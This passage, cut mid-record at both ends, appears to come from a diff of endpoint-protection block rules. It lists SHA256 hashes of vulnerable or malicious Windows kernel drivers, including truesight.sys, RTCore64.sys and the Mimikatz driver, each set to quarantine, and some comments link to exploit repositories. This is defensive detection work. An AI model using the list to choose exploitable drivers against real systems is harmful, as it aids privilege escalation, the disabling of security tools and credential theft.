[https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "93fedf1e-2b94-5a02-a62d-3dcea9a8cd21", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490084Z", + 
"creation_date": "2026-03-23T11:45:31.490086Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490092Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dff9d896a6d9c5e4ad62212f502035c481062a9b7c19fd54658fead161d6a371", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9409edb9-580f-55a9-be15-3069f798b8e1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976982Z", + "creation_date": "2026-03-23T11:45:29.976984Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976990Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "762989dc8ea7a6c5928254676052343ab1a15be2fd5ec3ded5f72487127ee590", + "comment": "Malicious Windows Kernel Explorer Driver (aka WindowsKernelExplorer.sys) [https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/] [authentihash SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "94129283-00ce-5d94-a24d-75ab2897182c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.975343Z", + "creation_date": "2026-03-23T11:45:29.975345Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.975350Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a076e66065161bdca4680f0f3a3d0767a25c344fa25cc64473f4ef4f926898ef", + "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "941f0bfb-c9e8-5e10-a4f3-8a7d5a46eb9e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.457478Z", + 
"creation_date": "2026-03-23T11:45:30.457482Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.457491Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3e1f592533625bf794e0184485a4407782018718ae797103f9e968ff6f0973a1", + "comment": "Vulnerable Kernel Driver (aka rtkio64.sys ) [https://www.loldrivers.io/drivers/8d3f27bd-c3fd-48d0-913a-e2caa6fbd025/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "94239da6-2175-5b8d-8a68-df842b72d335", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.612403Z", + "creation_date": "2026-03-23T11:45:29.612404Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.612410Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "673bcec3d53fab5efd6e3bac25ac9d6cc51f6bbdf8336e38aade2713dc1ae11b", + "comment": "ASUS WinFlash vulnerable driver (aka ATSZIO.sys and ATSZIO64.sys) [https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9450e6ff-4fce-5edc-88e9-e035eeb71eac", + "test_maturity_current_count": 
0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604283Z", + "creation_date": "2026-03-23T11:45:29.604285Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604290Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ac76256f8ca6608abe84ca194d46bc581706ecc6813e1abe5fa2b6cc3b4bdade", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "945746b8-d2c9-5696-96c2-fd9626d702c1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159288Z", + "creation_date": "2026-03-23T11:45:31.159292Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159301Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": 
null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f11891bc187a7a7ce69f67866216c3a3a2579c3ed8c8a011ad61eb5e1e811f80", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9463724d-da4d-5296-b4e0-7f6959991a3a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.825716Z", + "creation_date": "2026-03-23T11:45:31.825718Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825724Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cd78008c060e3613053cbccdab514f3622d66bbca32800a00a2c3e7dddf19899", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "946a3ca8-625b-54e3-afb1-08ef8f457652", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.469658Z", + "creation_date": "2026-03-23T11:45:30.469661Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.469671Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "77d7a8efe05ab7041fa33280f271edca9fa46c074885de5d03f4cbf343e65f2d", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "948adb32-87a7-53ee-87ce-2a23c59ac824", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.817435Z", + "creation_date": "2026-03-23T11:45:30.817437Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.817443Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cb3dd0482092eb019dc11797dcf09f69fb3f06330e1fba0047678b226b57c2cd", + "comment": "Vulnerable Kernel Driver (aka 
AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "949bdc61-5746-5181-a0b8-309c8d04c0af", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.814807Z", + "creation_date": "2026-03-23T11:45:31.814811Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.814821Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5c0f29e618de3279c8e8acfa40e5401c07babd6745b424c70924e4af4c70a5fd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "94b5c781-0054-51f6-aca2-7c976bf1e3e6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:31.152262Z", + "creation_date": "2026-03-23T11:45:31.152265Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.152273Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7e9f972b519c685988bc5a7f6c4ccb22b9a772e9656bb993b6352106debe4b61", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "94b86396-5cdb-5c00-9dfa-a058b466d8b5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607979Z", + "creation_date": "2026-03-23T11:45:29.607981Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607986Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "478c36f8af7844a80e24c1822507beef6314519185717ec7ae224a0e04b2f330", + "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + 
"id": "94bd268d-12b7-52ee-8b35-7774be423938", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828311Z", + "creation_date": "2026-03-23T11:45:30.828313Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828319Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ba02e43430d579145900f42374fc56bf273024ecfbd44ce5532eda11ac0ba508", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "94be0003-257a-5907-bd65-33d21497d65b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818364Z", + "creation_date": "2026-03-23T11:45:30.818366Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818371Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "680ddece32fe99f056e770cb08641f5b585550798dfdf723441a11364637c7e6", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "94d5ac28-9db0-500f-8686-954e961d829b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819585Z", + "creation_date": "2026-03-23T11:45:30.819587Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819592Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f4e500a9ac5991da5bf114fa80e66456a2cde3458a3d41c14e127ac09240c114", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "94d60cc0-9cfb-5cc0-9652-0ba2c2dc7860", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.970315Z", + "creation_date": "2026-03-23T11:45:29.970317Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.970322Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f9b01406864ab081aa77eef4ad15cb2dd2f830d1ef54f52622a59ff1aeb05ba5", + "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "94e2e2ef-8d3e-5f8b-b372-6e6410980cdf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.832567Z", + "creation_date": "2026-03-23T11:45:30.832570Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.832575Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b3832cb8733556dd51ecfe0249453dbb1c2e68a4fadd2ccdda42095e6d34e143", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "94ec62c4-a471-5be9-ad86-3a60a50fa768", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605469Z", + "creation_date": "2026-03-23T11:45:29.605471Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605476Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9b6a84f7c40ea51c38cc4d2e93efb3375e9d98d4894a85941190d94fbe73a4e4", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "94f48674-5043-5968-8419-00d4647b4c97", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:29.972055Z", + "creation_date": "2026-03-23T11:45:29.972057Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972062Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a59c40e7470b7003e8adfee37c77606663e78d7e3f2ebb8d60910af19924d8df", + "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "94f72601-f212-5b22-860a-2e09abaabcc3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.812580Z", + "creation_date": "2026-03-23T11:45:31.812582Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.812587Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3937547494dc6b46f7b584635a8e15d1a63101b4d90a7d11bef54b0d70537e1c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9516741f-12fa-5711-8b5d-cb434fca36c8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819360Z", + "creation_date": "2026-03-23T11:45:30.819362Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819367Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e38c1b19e1bef9be8e9d8aa0d599086acb33867988e4077e0e7f35cc2bb30738", + "comment": "Vulnerable Kernel Driver (aka hwdetectng.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "952631bf-32cd-5c56-9634-6538d0db7e4b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.824349Z", + "creation_date": "2026-03-23T11:45:30.824351Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:30.824357Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6ca247c3ca4ba56ca1e2c8a5972d5a147de33b335f0b8dcebc8657cd1c4b5f83", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "952d56b7-e4e1-58ed-b37c-56e68c2bf0fb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.836754Z", + "creation_date": "2026-03-23T11:45:30.836756Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.836761Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6cf4d8c1ec738738fa6c7cd130c9658eb21faaef0a9f8659bde2efaad88d02b2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "952fe222-ddf0-567a-8417-60f175f39a77", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
